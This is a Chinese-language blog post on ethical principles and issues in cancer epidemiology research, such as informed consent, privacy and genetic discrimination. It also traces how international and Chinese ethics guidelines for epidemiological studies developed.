**is.dataFormat.array**
**is.dataFormat.guid**
**means.identity.entityId**
**is.linkedEntity.identifier**
Marks the attribute(s) that hold foreign key references to a linked (used as an attribute) entity. This attribute is added to the resolved entity to enumerate the referenced entities. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>entityReferences</td><td><table><tr><th>entityReference</th><th>attributeReference</th></tr><tr><td><a href="../../../Tables/Finance/Bank/Main/BankBillOfExchangeLayout.md" target="_blank">/core/operationsCommon/Tables/Finance/Bank/Main/BankBillOfExchangeLayout.cdm.json/BankBillOfExchangeLayout</a></td><td><a href="../../../Tables/Finance/Bank/Main/BankBillOfExchangeLayout.md#RecId" target="_blank">RecId</a></td></tr></table></td><td>entity</td><td>a reference to the constant entity holding the list of entity references</td></tr></table>
**is.dataFormat.guid**
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#Relationship_PrimaryCompanyContextRelationshipId name="Relationship_PrimaryCompanyContextRelationshipId">Relationship_PrimaryCompanyContextRelationshipId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>guid</td></tr></table>
#### Traits
<details>
<summary>List of traits for the Relationship_PrimaryCompanyContextRelationshipId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.dataFormat.guid**
**means.identity.entityId**
**is.linkedEntity.identifier**
Marks the attribute(s) that hold foreign key references to a linked (used as an attribute) entity. This attribute is added to the resolved entity to enumerate the referenced entities. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>entityReferences</td><td><table><tr><th>entityReference</th><th>attributeReference</th></tr><tr><td><a href="../../../Tables/Finance/Ledger/Main/CompanyInfo.md" target="_blank">/core/operationsCommon/Tables/Finance/Ledger/Main/CompanyInfo.cdm.json/CompanyInfo</a></td><td><a href="../../../Tables/Finance/Ledger/Main/CompanyInfo.md#RecId" target="_blank">RecId</a></td></tr></table></td><td>entity</td><td>a reference to the constant entity holding the list of entity references</td></tr></table>
**is.dataFormat.guid**
**is.dataFormat.character**
**is.dataFormat.array**
</details>
| 37.561798 | 821 | 0.740951 | eng_Latn | 0.395305 |
e05402b55938141e2152b550f43e3c3a6a337eed | 75 | md | Markdown | README.md | mirazib71/StockManagementSystem-DB-Project | bbbcf8e4f45b8f5fae844368e035c1cb95043ed8 | [
"MIT"
] | null | null | null | README.md | mirazib71/StockManagementSystem-DB-Project | bbbcf8e4f45b8f5fae844368e035c1cb95043ed8 | [
"MIT"
] | null | null | null | README.md | mirazib71/StockManagementSystem-DB-Project | bbbcf8e4f45b8f5fae844368e035c1cb95043ed8 | [
"MIT"
] | null | null | null | # StockManagementSystem-DB-Project
CSE 3.2 DATABASE PROJECT USING JAVA GUI
| 25 | 39 | 0.826667 | yue_Hant | 0.842938 |
e05446beb24b9b627c74066e2d26064259bf58b8 | 319 | md | Markdown | README.md | melo0187/sales_record | 165b5f6d892a94dbaf1868fcc641bed875371392 | [
"MIT"
] | null | null | null | README.md | melo0187/sales_record | 165b5f6d892a94dbaf1868fcc641bed875371392 | [
"MIT"
] | null | null | null | README.md | melo0187/sales_record | 165b5f6d892a94dbaf1868fcc641bed875371392 | [
"MIT"
] | null | null | null | # Sales Record
A tool intended to record sales and receive reminders to solicit new business
Since this is my first serious attempt to build an Electron app it will be strongly based on [Electron API Demos](https://github.com/electron/electron-api-demos)
## Attributions
Uses Icon from http://www.doublejdesign.co.uk/ | 45.571429 | 161 | 0.793103 | eng_Latn | 0.97816 |
e0544a7bd098206ebfb2fbf14de2beb1213ccb69 | 3,607 | md | Markdown | Assets/xNode/README.md | AphexRebellion/Synthesize | 5e958500c62e19ff3b651297e493a6ed5dc92e00 | [
"MIT"
] | 3 | 2021-11-09T21:12:19.000Z | 2022-03-11T23:39:40.000Z | Assets/xNode/README.md | AphexRebellion/Synthesize | 5e958500c62e19ff3b651297e493a6ed5dc92e00 | [
"MIT"
] | null | null | null | Assets/xNode/README.md | AphexRebellion/Synthesize | 5e958500c62e19ff3b651297e493a6ed5dc92e00 | [
"MIT"
] | null | null | null | [](https://discord.gg/qgPrHv4)
[](https://github.com/Siccity/xNode/issues)
[](https://raw.githubusercontent.com/Siccity/xNode/master/LICENSE.md)
[](https://github.com/Siccity/xNode/wiki)
[Downloads](https://github.com/Siccity/xNode/releases) / [Asset Store](http://u3d.as/108S) / [Documentation](https://github.com/Siccity/xNode/wiki)
### xNode
Thinking of developing a node-based plugin? Then this is for you. You can download it as an archive and unpack to a new unity project, or connect it as git submodule.
xNode is super userfriendly, intuitive and will help you reap the benefits of node graphs in no time.
With a minimal footprint, it is ideal as a base for custom state machines, dialogue systems, decision makers etc.

### Key features
* Lightweight in runtime
* Very little boilerplate code
* Strong separation of editor and runtime code
* No runtime reflection (unless you need to edit/build node graphs at runtime. In this case, all reflection is cached.)
* Does not rely on any 3rd party plugins
* Custom node inspector code is very similar to regular custom inspector code
### Wiki
* [Getting started](https://github.com/Siccity/xNode/wiki/Getting%20Started) - create your very first node node and graph
* [Examples branch](https://github.com/Siccity/xNode/tree/examples) - look at other small projects
### Node example:
```csharp
[System.Serializable]
public class MathNode : Node {
// Adding [Input] or [Output] is all you need to do to register a field as a valid port on your node
[Input] public float a;
[Input] public float b;
// The value of an output node field is not used for anything, but could be used for caching output results
[Output] public float result;
[Output] public float sum;
// The value of 'mathType' will be displayed on the node in an editable format, similar to the inspector
public MathType mathType = MathType.Add;
public enum MathType { Add, Subtract, Multiply, Divide}
// GetValue should be overridden to return a value for any specified output port
public override object GetValue(NodePort port) {
// Get new a and b values from input connections. Fallback to field values if input is not connected
float a = GetInputValue<float>("a", this.a);
float b = GetInputValue<float>("b", this.b);
// After you've gotten your input values, you can perform your calculations and return a value
if (port.fieldName == "result")
switch(mathType) {
case MathType.Add: default: return a + b;
case MathType.Subtract: return a - b;
case MathType.Multiply: return a * b;
case MathType.Divide: return a / b;
}
else if (port.fieldName == "sum") return a + b;
else return 0f;
}
}
```
Join the [Discord](https://discord.gg/qgPrHv4 "Join Discord server") server to leave feedback or get support.
Feel free to also leave suggestions/requests in the [issues](https://github.com/Siccity/xNode/issues "Go to Issues") page.
Projects using xNode:
* [Graphmesh](https://github.com/Siccity/Graphmesh "Go to github page")
* [Dialogue](https://github.com/Siccity/Dialogue "Go to github page")
| 51.528571 | 166 | 0.71583 | eng_Latn | 0.873997 |
e0548297ddfee62a6de9dffd485b742f3d88424f | 1,705 | md | Markdown | README.md | alexa/apl-viewhost-web | 1d8703f23eec28f888e83416aa1a18dfc3af1f53 | [
"Apache-2.0"
] | 14 | 2020-08-27T00:25:18.000Z | 2022-03-30T20:18:33.000Z | README.md | rcoleworld/apl-viewhost-web | d5aa444a5233a6b9a372d61eac857bfd6f31c107 | [
"Apache-2.0"
] | 9 | 2020-08-05T04:19:55.000Z | 2022-03-25T19:16:36.000Z | README.md | rcoleworld/apl-viewhost-web | d5aa444a5233a6b9a372d61eac857bfd6f31c107 | [
"Apache-2.0"
] | 6 | 2020-09-25T11:01:12.000Z | 2022-03-30T20:16:18.000Z | # Alexa Presentation Language (APL) Viewhost Web
<p>
<a href="https://github.com/alexa/apl-viewhost-web/tree/v1.8.0" alt="version">
<img src="https://img.shields.io/badge/stable%20version-1.8.0-brightgreen" /></a>
<a href="https://github.com/alexa/apl-core-library/tree/v1.8.1" alt="APLCore">
<img src="https://img.shields.io/badge/apl%20core%20library-1.8.1-navy" /></a>
</p>
## Introduction
The APL ViewHost Web is language-specific APL "view host", which is responsible for performing the rendering in the Web
platform or framework for which the view host was designed by leveraging the functionality and support from [APL Core library](https://github.com/alexa/apl-core-library).
## Installation
### Prerequisites
* [NodeJS](https://nodejs.org/en/) - version 10.x or higher
* [cmake](https://cmake.org/install/) - the easiest way to install on Mac is using `brew install cmake`
* [Yarn](https://yarnpkg.com/getting-started/install)
### Installation Steps
The easiest way to use apl-viewhost-web is to install it from npm and build it into your app with webpack.
```
npm install apl-viewhost-web
```
**note**: The package install will pull and build [APL Core library](https://github.com/alexa/apl-core-library) locally,
this make take a while.
## Security
See [CONTRIBUTING](CONTRIBUTING.md#security-issue-notifications) for more information.
## License
This project is licensed under the Apache-2.0 License. Proprietary fonts are not licensed under an open source license, but instead subject to Amazon’s Trademark Guidelines, available [here](https://developer.amazon.com/support/legal/tuabg#trademark). Please see the [LICENSE](fonts/LICENSE.txt) file in the fonts sub-directory.
| 41.585366 | 328 | 0.750147 | eng_Latn | 0.844708 |
e054a4fc2e00d2746ae24ab60b24ee6b8a42d8c8 | 2,898 | md | Markdown | README.md | soulman-is-good/pg-git | 5adb3271044fdaf2cc042e3d69d94fab820b6f64 | [
"MIT"
] | 1 | 2021-01-13T01:21:31.000Z | 2021-01-13T01:21:31.000Z | README.md | soulman-is-good/pg-git | 5adb3271044fdaf2cc042e3d69d94fab820b6f64 | [
"MIT"
] | 4 | 2017-03-12T13:46:24.000Z | 2021-05-10T01:37:45.000Z | README.md | soulman-is-good/pg-git | 5adb3271044fdaf2cc042e3d69d94fab820b6f64 | [
"MIT"
] | null | null | null | ### PostgreSQL simple code dumping tool with diff migration
  
**Best used with git** :octocat:
This tool was written to help migrate between different servers and to help with distributed development on PostgreSQL.
The tool will automatically download the latest Postgres binaries for the platform unless the `NO_DOWNLOAD` env variable or the `--no_download` flag is specified.
Otherwise, the tool will try to use the system default `pg_dump` and `psql` binaries.
WARNING: This tool uses and bundles:
- [apgdiff](https://github.com/fordfrog/apgdiff) v2.6 jar file (requires Java VM)
**node >=11.0.0**
If you want to override this with your own binaries, e.g. the system defaults, then use the environment variables or CLI params described below.
#### Usage
Commonly the tool is used standalone or installed as a dependency and run through npm. But you can also `require`
it within your project, though there is not much use for it that way.
```js
const { dump, diff, apply, StringStream } = require('pg-git');
const options = {
user: 'postgres',
password: 'postgres',
database: 'postgres',
host: 'localhost',
port: 5432,
noDownload: true,
};
const newDump = new StringStream('CREATE TABLE public.test(id integer);');
// dump current database, make a diff and apply
dump(options)
.then(dumpStream => diff(options, dumpStream, newDump))
.then(diffStream => apply(options, diffStream))
.catch(console.error);
```
Or you can install the tool globally (or locally, and use it with `npm run ...`)
```
npm i -g pg-git
```
And use it in your project
Usage
```
pgit [options] <command>
Commands:
commit - Create new dump
migrate - Make a diff with dump file and apply it to database
Options:
--user <USERNAME> - database user
--password <PASSWORD> - database password
--host <HOST> - pg host
--port <PORT> - database port
--dumpname <dumpname> - dump file name. default: dump.sql
--pgversion <version> - postgres version to use. Specify exact version or only part else latest will be taken. E.g. 10 or 9.5 or 9.4.21
--psql <path> - path to psql binary
--pg_dump <path> - path to pg_dump binary
--no_download <any> - do not download binaries from external resource
```
Example
```
pg-git --user postgres --password postgres --host 127.0.0.1 --port 5432 commit my_database
```
#### Environment variables
```
PGUSER - Postgres user
PGHOST - Postgres host
PGDATABASE - Postgres database name
PGPASSWORD - Postgres password for user
PGVERSION - postgres version to use. Specify exact version or only part else latest will be taken. E.g. 10 or 9.5 or 9.4.21
PSQL_PATH - Absolute path to your psql binary file
PG_DUMP_PATH - Absolute path to your pg_dump binary file
NO_DOWNLOAD - do not download binaries from external resource
```
| 31.846154 | 195 | 0.728433 | eng_Latn | 0.934164 |
e05587e8556929b5d23788757ec8e82b93187b82 | 902 | md | Markdown | dynamics-nav/FINDFIRSTFIELD-Function--TestPage-.md | dennisroczek/navdevitpro-content-pr | 1bf11f3f948c600e3d1426bb9ab5d1d6dd1db4f7 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2020-01-20T03:29:28.000Z | 2021-04-21T00:13:46.000Z | dynamics-nav/FINDFIRSTFIELD-Function--TestPage-.md | dennisroczek/navdevitpro-content-pr | 1bf11f3f948c600e3d1426bb9ab5d1d6dd1db4f7 | [
"CC-BY-4.0",
"MIT"
] | 260 | 2019-10-31T19:29:48.000Z | 2022-03-30T20:46:14.000Z | dynamics-nav/FINDFIRSTFIELD-Function--TestPage-.md | dennisroczek/navdevitpro-content-pr | 1bf11f3f948c600e3d1426bb9ab5d1d6dd1db4f7 | [
"CC-BY-4.0",
"MIT"
] | 13 | 2019-12-06T15:06:58.000Z | 2022-03-23T22:01:57.000Z | ---
title: "FINDFIRSTFIELD Function (TestPage)"
ms.custom: na
ms.date: 06/04/2016
ms.reviewer: na
ms.suite: na
ms.tgt_pltfrm: na
ms.topic: article
ms.prod: "dynamics-nav-2018"
ms.assetid: 91c8fec5-7f57-431b-93d1-a238e9249e7b
caps.latest.revision: 7
manager: edupont
---
# FINDFIRSTFIELD Function (TestPage)
Finds the first field in the dataset that is displayed on a test page.
## Syntax
```
[Ok :=] TestPage.FINDFIRSTFIELD(Field, Value);
```
#### Parameters
*TestPage*
Type: TestPage
The test page that contains the dataset that you want to find.
*Field*
Type: Field
The field to find.
*Value*
Type: Any
The value of the field.
## Property Value/Return Value
Type: Boolean
**true** if the first field is found; otherwise, **false**. The return value is optional.
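## Example
The following sketch shows one way the function might be called from a test codeunit. The test page variable, field, and search value are hypothetical and only illustrate the documented syntax.
```
// CustomerList is assumed to be a TestPage variable for a customer list page.
CustomerList.OPENVIEW;
// Look for the first row of the dataset whose Name field has the given value.
Ok := CustomerList.FINDFIRSTFIELD(Name, 'CRONUS International Ltd.');
IF NOT Ok THEN
  ERROR('The expected Name value was not found in the dataset.');
CustomerList.CLOSE;
```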
## See Also
[TestPage Functions](TestPage-Functions.md) | 20.044444 | 92 | 0.675166 | eng_Latn | 0.720792 |
e055b31812b3f017c08166a2cff0f61bc02457db | 5,725 | md | Markdown | README.md | CodeLingoBot/roving | 08bb7cf374ba5fca2b3764f293c579f36aa93a2a | [
"MIT"
] | null | null | null | README.md | CodeLingoBot/roving | 08bb7cf374ba5fca2b3764f293c579f36aa93a2a | [
"MIT"
] | null | null | null | README.md | CodeLingoBot/roving | 08bb7cf374ba5fca2b3764f293c579f36aa93a2a | [
"MIT"
] | null | null | null | Roving
======
Distributed fuzzing using AFL.
# Overview
## AFL
AFL is a "fuzzer". You give it a target program, and it runs that target
program zillions of times, trying to find input that causes it to crash.
It uses instrumentation of the target program's code to try to manipulate its
input so that it explores as much of the target program as possible.
## Roving
A roving cluster runs multiple copies of AFL on multiple machines, all
fuzzing the same target. Roving's key contribution is to allow these
machines to share and benefit from each other's work. If machine A finds
an "interesting" test case that causes a new function to get invoked,
machines B, C and D can all use this discovery to explore the rest of
the program more efficiently.
### Cluster structure
A roving cluster consists of 1 server and N clients. Each client runs M
copies of AFL (using AFL's existing parallelism settings), and uses the
server to share their work with their peers. Each fuzzer on the client
periodically (by default, every 5 mins) uploads to the server their
current AFL state, including their queue. The server saves these states
in memory.
Fuzzers take advantage of the work of their peers by downloading
from the server the state of all clients in the cluster. They replace
their current queue with the combined queues of all clients, and then
continue fuzzing as before. This allows all clients to benefit from the
new, interesting testcases that any individual client discovers.
This approach relies on the non-determinism of AFL. If every client
deterministically ran the same test cases when given the same queue,
we would simply be repeating the same work N times across N different
clients. In reality, clients take the same queue and run in wildly
different directions with it. This means that we cover more of the search
space, faster.
That said, there is no formal partitioning of work, and there *will* be
some amount of duplication of work between clients. We do not currently
have any estimates of how much work is duplicated, but it is safe to say
that running 10 roving clients will not get you 10x the edge-discovery
rate of 1 client. Roving uses the same principle as AFL's own
single-machine parallelism, so we still have good reason to believe
that it is effective.
# Usage
## Bazel
For now roving uses [Bazel][https://docs.bazel.build/versions/master/install.html]
for its build. You'll need to download it in order to build roving.
## Roving Server
* Export `AFL` with the path to afl, or make sure `afl-fuzz` is on `PATH`
* In the workdir, create a `target` binary [optional]
* In the workdir, make a directory called `input` and populate it with a corpus
* Run `bazel build //cmd/srv`
* Run `bazel-bin/cmd/srv/darwin_amd64_stripped/srv`
Once up, it will create a directory called `output` that mirrors the
structure of the `output` directory created by AFL. It will aggregate
crashes, hangs, and the queue.
There is also a basic (but improving!) admin page at `SERVER_URL:SERVER_PORT/admin`.
## Roving Clients
Clients should require almost no configuration.
* Run `bazel build //cmd/client`
* Run `bazel-bin/cmd/client/darwin_amd64_stripped/client -- -server-hostport XYZ:123 -parallelism X`
Clients will accumulate crashes and hangs in their working dir. They will
sync them to the server.
## Advanced usage
Run the compiled binaries with the `-help` flag or see the files in the `cmd/`
folder for advanced options.
# Development
## Tests
The test suite is not particularly extensive, but you can run it
using:
```
bin/test
```
## Design principles
### Roving clients should be very dumb
Roving clients should be very dumb and have very
little configuration. This is so that clients can easily
be brought up, pointed at any roving server of any type, and
quickly start working.
If a roving server requires clients to be configured
in a particular way (perhaps the server wants them
to sync their work with it more frequently than normal),
this should be passed as configuration to the *server*,
which should then send it to the client when it starts up
and joins the cluster.
### Fuzzer-agnosticism is good but currently not essential
We would like roving to be fuzzer-agnostic in the future. It should be
possible to power your fuzzing using `afl`, `libfuzzer`, `hongfuzz`, or
any other reasonable fuzzer.
All of these fuzzers work in somewhat different ways and have somewhat
different structures and opinions. We are comfortable loosely coupling
ourselves to `afl` for now - for example, we assume that fuzzer input and
output is structured in the way that `afl` expects. However, we would like
multi-fuzzer support to be an achievable goal in the future, and would like
to avoid making decisions that would make this unreasonably difficult.
## Running the examples
The example code bash scripts live in the `examples/` directory.
### C
* `examples/c-server` to build the target and run the example server serving the C example target on the default port 1414
* `examples/generic-client` to run the example client
Your client should find a crash within 30 seconds.
### Ruby
* [Install `afl-ruby`][afl-ruby]
* `examples/ruby-server` to run the example server serving the Ruby example target on the default port 1414
* `examples/generic-client` to run the example client
Your client should again find a crash within 30 seconds.
# Why Roving?
I asked some of my coworkers what they'd name a distributed fuzzy thing.
Evidently [roving][0] is extremely fuzzy, and winds up **everywhere** when
you're working with it. Plus the testcases go roving and it's all very poetic.
[0]: https://en.wikipedia.org/wiki/Roving
[afl-ruby]: https://github.com/richo/roving
| 36.006289 | 122 | 0.775895 | eng_Latn | 0.999515 |
e05609151488a44a2a67693fc18342ee69a5d56b | 410 | md | Markdown | docs/assembler/masm/group.md | Dinja1403/cpp-docs | 50161f2a9638424aa528253e95ef9a94ef028678 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-02-19T06:12:36.000Z | 2021-03-27T20:46:59.000Z | docs/assembler/masm/group.md | Dinja1403/cpp-docs | 50161f2a9638424aa528253e95ef9a94ef028678 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/assembler/masm/group.md | Dinja1403/cpp-docs | 50161f2a9638424aa528253e95ef9a94ef028678 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-12-24T04:34:32.000Z | 2020-12-24T04:34:32.000Z | ---
title: "GROUP"
ms.date: "11/05/2019"
f1_keywords: ["group"]
helpviewer_keywords: ["GROUP directive"]
ms.assetid: 55dc9548-154e-486d-849a-135e4631eca9
---
# GROUP
(32-bit MASM only.) Add the specified *segments* to the group called *name*.
## Syntax
> *name* **GROUP** *segment* ⟦__,__ *segment* ...⟧
## See also
[Directives reference](directives-reference.md)\
[MASM BNF Grammar](masm-bnf-grammar.md)
| 20.5 | 76 | 0.695122 | eng_Latn | 0.477778 |
e0560c7276b95fa16bb64166979fc7eae347c548 | 676 | md | Markdown | README.md | mchmarny/dapr-state-store-change-handler | 1e93dbaecd798af314f683ad4a6c37e217fc5762 | [
"MIT"
] | null | null | null | README.md | mchmarny/dapr-state-store-change-handler | 1e93dbaecd798af314f683ad4a6c37e217fc5762 | [
"MIT"
] | null | null | null | README.md | mchmarny/dapr-state-store-change-handler | 1e93dbaecd798af314f683ad4a6c37e217fc5762 | [
"MIT"
] | null | null | null | # Dapr State Change Publisher
## Components
### Source
```yaml
apiVersion: dapr.io/v1alpha1
kind: Component
metadata:
name: changes
spec:
type: digitaltwins.rethinkdb.statechange
metadata:
- name: address
value: "127.0.0.1:28015"
- name: database
value: "dapr"
```
### Target
```yaml
apiVersion: dapr.io/v1alpha1
kind: Component
metadata:
name: events
spec:
type: pubsub.redis
metadata:
- name: redisHost
value: localhost:6379
- name: redisPassword
value: ""
```
## Service
```shell
dapr run --app-id publisher \
--protocol grpc \
--app-port 50001 \
--components-path ./config \
go run main.go
``` | 15.022222 | 42 | 0.634615 | eng_Latn | 0.256506 |
e0562f5f71371e2ef06d215aa9a90a8b384ba230 | 1,496 | md | Markdown | README.md | bobc/maple-asp | b3b57daa42133f0038e6269c09f837edd907ef45 | [
"MIT"
] | 19 | 2015-01-14T17:58:04.000Z | 2020-11-05T05:33:08.000Z | README.md | bobc/maple-asp | b3b57daa42133f0038e6269c09f837edd907ef45 | [
"MIT"
] | 1 | 2015-07-19T07:21:21.000Z | 2015-07-19T23:04:56.000Z | README.md | bobc/maple-asp | b3b57daa42133f0038e6269c09f837edd907ef45 | [
"MIT"
] | 12 | 2015-03-12T13:32:20.000Z | 2021-02-18T21:06:42.000Z | Arduino Support Package For Maple
=================================
Background
----------
Maple is a series of Arduino like boards created by LeafLabs (http://www.leaflabs.com/).
LeafLabs provided a version of the Arduino IDE tailored for Maple https://github.com/leaflabs/maple-ide
but it is no longer supported, and uses an old version of the Arduino IDE.
maple-asp provides support for Maple compatible boards for use with the "new" Arduino IDE 1.5.x, without requiring
any modifications to the Arduino IDE.
The bulk of maple-asp is the libmaple code https://github.com/leaflabs/libmaple, in the form of an Arduino add on package.
maple-asp
---------
Currently the following boards are supported:
- Maple Rev 3+
Installing
----------
Pre-requisites:
- Arduino IDE version 1.5.7 or later
Installation procedure:
1. Copy the Arduino/hardware/ folder to your sketchbook folder (e.g. ~/Arduino)
2. Restart Arduino IDE
Note: maple-asp is designed to be installed into your sketchbook, not the Arduino program folder, otherwise
it will not work properly.
TODO
----
- Implement all the board/memory variants
- create wrapper utility for DFU download
- support for linux
- build and test examples
Licenses
--------
maple-asp is an Open Source project.
libmaple is mostly licensed with MIT license.
Other files are licensed as GPL or BSD.
Please see individual files for Copyright notices.
Main Contributors
-----------------
- LeafLabs (maple-ide, libmaple)
- Bob Cousins
| 24.129032 | 126 | 0.727941 | eng_Latn | 0.987854 |
e0564eb03e16aaf47e08ec8d3ab953978f8d589d | 87 | md | Markdown | README.md | gpatricia223/devJobz-project_12 | 1cf3daef6c608f1cb00111d30a48c2c4f856cae1 | [
"MIT"
] | null | null | null | README.md | gpatricia223/devJobz-project_12 | 1cf3daef6c608f1cb00111d30a48c2c4f856cae1 | [
"MIT"
] | null | null | null | README.md | gpatricia223/devJobz-project_12 | 1cf3daef6c608f1cb00111d30a48c2c4f856cae1 | [
"MIT"
] | null | null | null | # devJobz-project_12
Student project app. Using REST APIs, Node, jQuery, and the rest.
| 29 | 65 | 0.770115 | eng_Latn | 0.649962 |
e0568958b094355af9f8bb7765609486b1d61278 | 1,349 | md | Markdown | _posts/2019-04-10-61.Reactor.md | liangjfblue/liangjfblue.github.io | 073de25c97fd059d5820ce9912ffe7229e0680c0 | [
"MIT"
] | null | null | null | _posts/2019-04-10-61.Reactor.md | liangjfblue/liangjfblue.github.io | 073de25c97fd059d5820ce9912ffe7229e0680c0 | [
"MIT"
] | 2 | 2018-02-16T15:23:31.000Z | 2018-02-16T15:29:47.000Z | _posts/2019-04-10-61.Reactor.md | liangjfblue/liangjfblue.github.io | 073de25c97fd059d5820ce9912ffe7229e0680c0 | [
"MIT"
] | null | null | null | ---
layout: post
title: Reactor model
subtitle: The iterative evolution of the Reactor model
date: 2019-04-14
author: Liangjf
header-img: img/post-bg-github-cup.jpg
catalog: true
tags:
- Network programming
---
> **BIO model**

> The main bottleneck is threads: each connection gets its own thread. Although a thread costs less than a process, the number of usable threads a single machine can actually create is limited.
------------------------------------------------------------
> **NIO model**

> Because reads are non-blocking, the application cannot tell when a message has been read completely, so the half-packet (partial read) problem appears.
------------------------------------------------------------
> **Single-threaded Reactor model**

> When clients send many requests, slow processing inside the Handler makes subsequent client requests back up, so responses slow down.
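To make the single-threaded variant concrete, below is a minimal Java NIO sketch (the class name and port are illustrative). One thread owns the `Selector` and performs accept, read, handler logic, and write in the same loop, which is exactly why a slow handler stalls every connection:
```java
import java.net.InetSocketAddress;
import java.nio.ByteBuffer;
import java.nio.channels.SelectionKey;
import java.nio.channels.Selector;
import java.nio.channels.ServerSocketChannel;
import java.nio.channels.SocketChannel;
import java.util.Iterator;

// Minimal single-threaded Reactor: one selector thread does accept, read and write.
public class SingleThreadReactor {
    public static void main(String[] args) throws Exception {
        Selector selector = Selector.open();
        ServerSocketChannel server = ServerSocketChannel.open();
        server.bind(new InetSocketAddress(9090));
        server.configureBlocking(false);
        server.register(selector, SelectionKey.OP_ACCEPT);

        while (true) {
            selector.select();                                  // block until something is ready
            Iterator<SelectionKey> it = selector.selectedKeys().iterator();
            while (it.hasNext()) {
                SelectionKey key = it.next();
                it.remove();
                if (key.isAcceptable()) {                       // dispatch: new connection
                    SocketChannel client = server.accept();
                    client.configureBlocking(false);
                    client.register(selector, SelectionKey.OP_READ);
                } else if (key.isReadable()) {                  // dispatch: data to read
                    SocketChannel client = (SocketChannel) key.channel();
                    ByteBuffer buf = ByteBuffer.allocate(1024);
                    int n = client.read(buf);
                    if (n == -1) { client.close(); continue; }
                    buf.flip();
                    // The "Handler" runs on this same thread: if it is slow,
                    // every other connection has to wait (the bottleneck described above).
                    client.write(buf);                          // echo the bytes back
                }
            }
        }
    }
}
```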
------------------------------------------------------------
> **Multi-threaded Reactor model**

> The single Reactor has to both handle I/O operation requests and accept new connection requests, so it becomes a bottleneck.
------------------------------------------------------------
> **Main/sub (master-slave) Reactor model**

> The main Reactor accepts connection requests, while the sub Reactors handle the I/O operation requests.
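Netty (not mentioned in the original post) is a well-known implementation of this model: its boss event-loop group plays the main Reactor and its worker group the sub Reactors. A minimal sketch, with `EchoServerHandler` as a hypothetical business handler:
```java
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;

public class MainSubReactorServer {
    public static void main(String[] args) throws Exception {
        EventLoopGroup bossGroup = new NioEventLoopGroup(1);   // main Reactor: accepts connections
        EventLoopGroup workerGroup = new NioEventLoopGroup();  // sub Reactors: handle I/O
        try {
            ServerBootstrap b = new ServerBootstrap();
            b.group(bossGroup, workerGroup)
             .channel(NioServerSocketChannel.class)
             .childHandler(new ChannelInitializer<SocketChannel>() {
                 @Override
                 protected void initChannel(SocketChannel ch) {
                     ch.pipeline().addLast(new EchoServerHandler()); // hypothetical handler
                 }
             });
            ChannelFuture f = b.bind(9090).sync();
            f.channel().closeFuture().sync();
        } finally {
            bossGroup.shutdownGracefully();
            workerGroup.shutdownGracefully();
        }
    }
}
```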
e056902c28b0686cf322adf073d9d7cb74d4b926 | 4,220 | md | Markdown | content/cn/2020-04-16-ethics.md | gigu003/www.chenq.site | 4011d234e02cf083811f834bb8f1248f3e0c1d5d | [
"MIT"
] | 1 | 2021-07-25T15:00:06.000Z | 2021-07-25T15:00:06.000Z | content/cn/2020-04-16-ethics.md | gigu003/www.chenq.site | 4011d234e02cf083811f834bb8f1248f3e0c1d5d | [
"MIT"
] | null | null | null | content/cn/2020-04-16-ethics.md | gigu003/www.chenq.site | 4011d234e02cf083811f834bb8f1248f3e0c1d5d | [
"MIT"
] | null | null | null | ---
title: "医学伦理学在肿瘤流行病学中的应用"
author: "Qiong Chen"
date: '2020-04-16'
slug: ethics
tags:
- 伦理
categories:
- Epidemiology
---
1964年在第18届世界医学大会通过的生物学和药学临床研究指南《赫尔辛基宣言》、国际医学科学组织委员会颁布的《人体生物医学研究国际道德指南》和国际流行病学协会制定的流行病学研究的伦理学条约,均明确指出了生物医学研究的四个基本伦理学原则,即自主性、有益性、无害性和公平性。
在开展肿瘤流行病学研究中主要涉及的伦理问题包括知情同意、隐私保护等,传统的观察性研究所涉及的伦理主要有研究目的知情、自主决策权、个人或家庭资料的披露、筛查的伦理问题、研究资料的归属权、调查参与者和地区分布的公平性、研究结果的传播和疾病监测过程的伦理问题。随着肿瘤流行病学研究范畴的拓展,研究对象从宏观发展至微观,研究者面临的伦理学问题也日益突出,涉及的伦理问题包括个体生物标本和个人信息采集的知情同意、基因的私密性问题和基因歧视问题。而近年来开展的肿瘤临床试验中,干预的随机化过程也面临伦理学抉择问题。
随着肿瘤流行病学的不断发展,也在不断出现新的伦理学问题,如何正确认识研究伦理学意义,解决伦理学冲突,保护研究对象的权益,成为目前研究关注的重点之一。
## 国内外流行病学研究伦理规范的发展
国际上流行病学研究伦理规范的发展较早,1985年美国流行病学学会(ACE)批准成立伦理和行为规范委员会,1989年美国流行病学杂志发表“Epidemiology: Questions Of Science, Ethics, Morality, And Law”,专门论述了流行病学研究中的伦理学问题1。1990年,国际流行病学学会召开伦理研讨会,讨论流行病学伦理准则草案。1991年,国际医学科学组织理事会(CIOMS)出版了“伦理学和流行病学的国际准则”,内容涉及流行病学工作者信息传播的责任问题、对研究对象的责任问题以及针对流行病学工作者的伦理指南。2002年CIOMS和世界卫生组织(WHO)修订《国际流行病学研究伦理指南》,2008年再次修订,是目前指导流行病学研究的权威性的伦理指导文件。
我国对流行病学研究中的伦理问题的重视程度不足,与国际上有一定差距。目前,我国还没有出台流行病学伦理问题的规范法规。我国医学伦理相关规范的发展起始于1998年卫生部颁布的“涉及人体的生物医学研究伦理审查办法”,2007年正式发布《涉及人的生物医学研究伦理审查办法(试行)》,2016年9月30日国家卫生计生委委主任会议讨论通过《涉及人的生物医学研究伦理审查办法》,并于2016年12月1日起正式施行2。
